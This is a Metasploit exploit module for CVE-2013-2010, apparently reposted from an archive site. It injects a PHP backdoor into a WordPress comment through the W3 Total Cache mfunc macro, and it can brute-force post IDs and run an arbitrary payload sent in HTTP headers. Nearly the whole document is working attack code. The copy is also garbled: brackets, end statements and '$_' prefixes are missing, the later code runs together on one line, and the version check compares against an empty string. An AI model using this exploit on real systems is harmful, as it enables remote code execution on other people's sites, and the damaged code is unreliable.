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WordPress W3 Total Cache PHP Code Execution
来源:metasploit.com 作者:hdm 发布时间:2015-03-25  
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class Metasploit3 < Msf::Exploit::Remote
  include Msf::HTTP::Wordpress
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  def initialize(info = {})
      'Name'           => 'WordPress W3 Total Cache PHP Code Execution',
      'Description'    => %q{
          This module exploits a PHP Code Injection vulnerability against WordPress plugin
        W3 Total Cache for versions up to and including  WP Super Cache 1.2 or older
        is also reported as vulnerable.  The vulnerability is due to the handling of certain
        macros such as mfunc, which allows arbitrary PHP code injection.  A valid post ID is
        needed in order to add the malicious comment.  If the POSTID option isn't specified,
        then the module will automatically find or bruteforce one.  Also, if anonymous comments
        aren't allowed, then a valid username and password must be provided.  In addition,
        the "A comment is held for moderation" option on WordPress must be unchecked for
        successful exploitation.  This module has been tested against WordPress 3.5 and
        W3 Total Cache on a Ubuntu 10.04 system.
      'Author'	=>
          'Unknown', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'hdm', # Metasploit module
          'Christian Mehlmauer' # Metasploit module
      'License'        => MSF_LICENSE,
      'References'     =>
          [ 'CVE', '2013-2010' ],
          [ 'OSVDB', '92652' ],
          [ 'BID', '59316' ],
          [ 'URL', 'http://wordpress.org/support/topic/pwn3d' ],
          [ 'URL', 'http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/' ],
          [ 'WPVDB', '6622' ]
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
          'DisableNops' => true,
      'Targets'        => [ ['Wordpress 3.5', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 17 2013'

          OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
          OptString.new('USERNAME', [ false,  "The user to authenticate as (anonymous if username not provided)"]),
          OptString.new('PASSWORD', [ false,  "The password to authenticate with (anonymous if password not provided)" ])
        ], self.class)

            OptInt.new('MIN_POST_ID', [ false, 'Specify the first post_id used for bruteforce', 1]),
            OptInt.new('MAX_POST_ID', [ false, 'Specify the last post_id used for bruteforce', 1000])

  def require_auth?
    @user = datastore['USERNAME']
    @password = datastore['PASSWORD']

    if @user and @password and not @user.empty? and not @password.empty?
      return true
      return false

  def post_comment(text)
    php_payload = "#{text}<!--mfunc if(isset(
SERVER['HTTP_SUM'])) { if (sha1(
SERVER['HTTP_SUM']) == '#{@sum}' ) { eval(base64_decode(
SERVER['HTTP_CMD'])); } } --><!--/mfunc-->" if @auth uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie) else author = rand_text_alpha(8) author_email = "#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com" author_url = rand_text_alpha(8) uri = wordpress_post_comment_no_auth(php_payload, @post_id, author, author_email, author_url ) @unauth_cookie = wordpress_get_unauth_comment_cookies(author, author_email, author_url) end uri end def exploit unless wordpress_and_online? fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site") end @auth = require_auth? if @auth print_status("#{peer} - Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end print_status("#{peer} - login successful") else print_status("#{peer} - Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") else print_status("#{peer} - Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| vprint_status("#{peer} - Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id print_status("#{peer} - Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") end end end random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) print_status("#{peer} - Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end print_status("#{peer} - Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded), 'Sum' => random_test } } options.merge!({'cookie' => @cookie}) if @auth # Used to see anonymous, moderated comments options.merge!({'cookie' => @unauth_cookie}) if @unauth_cookie res = send_request_cgi(options) if res and res.code == 301 fail_with(Failure::Unknown, "#{peer} - Unexpected redirection, maybe comments are moderated") end if res and !res.body.match(/#{Regexp.escape(text)}/) fail_with(Failure::Unknown, "#{peer} - Comment not in post, maybe comments are moderated") end end def check res = wordpress_and_online? unless res vprint_error("#{peer} does not seeem to be Wordpress site") return Exploit::CheckCode::Unknown end if res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /W3 Total Cache\/([0-9\.]*)/ version = $1 if version <= "" return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end end if res.body and (res.body =~ /Performance optimized by W3 Total Cache/ or res.body =~ /Cached page generated by WP-Super-Cache/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end end

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